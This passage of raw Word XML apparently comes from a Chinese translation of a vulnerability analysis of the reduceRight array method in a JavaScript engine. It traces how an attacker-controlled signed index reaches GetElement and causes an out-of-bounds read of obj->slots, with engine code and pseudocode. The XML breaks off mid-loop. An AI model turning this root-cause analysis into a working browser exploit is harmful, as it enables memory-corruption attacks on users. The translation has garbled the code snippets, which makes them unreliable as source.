        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ength</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tep</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>= 1</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4A7B39" w14:textId="79BFF6BD" w:rsidR="0026102A" w:rsidRDefault="005D386D">
      <w:pPr>
        <w:spacing w:before="25" w:line="500" w:lineRule="exact"/>
        <w:ind w:left="640" w:right="4479"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>switch</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ode</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30661B58" w14:textId="72B052B6" w:rsidR="0026102A" w:rsidRDefault="005D386D">
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="exact"/>
        <w:ind w:left="880"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">ase </w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>REDUCE_RIGHT</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5833BD15" w14:textId="3E724CC6" w:rsidR="0026102A" w:rsidRDefault="005D386D">
      <w:pPr>
        <w:spacing w:before="13"/>
        <w:ind w:left="1120"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>start</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>length</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>-1</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>= -1</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tep</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>= -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E9BEB9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49468EDB" w14:textId="7127485A" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="126" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="467"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>通过为reduceRight方法提供</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>= 2</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>参数，可以避免</w:t>
      </w:r>
      <w:r>
        <w:t>在第2784行上对GetElement的第一次调用。在行2839上对GetElement</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>的下一个调用是我们要达到的调用</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>此调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>位于for循环内，该循环</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>遍历数组的每个元素，该数组调用Java回调（作为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>reduceRight</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方法的第一个参数提供）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E3449F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:spacing w:line="278" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:sectPr w:rsidR="0026102A">
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1360" w:right="1020" w:bottom="280" w:left="1280" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53CC522A" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="15"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6078FD42" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="92" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="808"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>现在将可控制的带符号索引值传递给</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>GetElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，然后执行以下if语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C98AB50" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27F0E9D7" w14:textId="2BD0D206" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2559"/>
        </w:tabs>
        <w:spacing w:line="264" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="1737" w:firstLine="120"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>isDenseArray</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; index &lt;obj-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>getDenseArrayCapacity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp; [</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>360]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>！</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = obj-&gt; getDenseArrayElement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uint32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>））</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>）.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>isMagic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JS_ARRAY_HOLE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>））</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4AD687" w14:textId="77777777" w:rsidR="005D386D" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="13" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="6759"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>* hole = JS_FALSE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047A569" w14:textId="0FE11E0F" w:rsidR="0026102A" w:rsidRDefault="005D386D">
      <w:pPr>
        <w:spacing w:before="13" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="6759"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>eturn</w:t>
      </w:r>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>JS_TRUE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00691AB9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A191D9" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="206" w:lineRule="exact"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C651077" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="31"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C358EE1" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>以下伪代码说明了上面代码的360行上发生的情况：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB72BED" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:sz w:val="38"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="471CE2F0" w14:textId="148F7E50" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:ind w:left="346"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>vp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = obj-&gt;</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>lots</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>attacker_control_index</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3AE1BC" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FF2CD3F" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="1" w:line="278" w:lineRule="auto"/>
        <w:ind w:left="160" w:right="935"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">* </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>vp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>指针现在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>指向obj-&gt; slots数组的边界，该数组超出了攻击者控制的偏移量。如果这没有指向</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>映射的页面，则该过程将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>崩溃。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B8F5EE" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:before="19"/>
        <w:ind w:left="160"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>返回array_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>extra函数，执行以下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>代码</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72BF71AA" w14:textId="77777777" w:rsidR="0026102A" w:rsidRDefault="0026102A">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35788E87" w14:textId="0E1C2096" w:rsidR="0026102A" w:rsidRDefault="00691AB9">
      <w:pPr>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:ind w:left="400" w:right="4480" w:hanging="241"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>jsint</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> =</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005D386D">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>tart</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
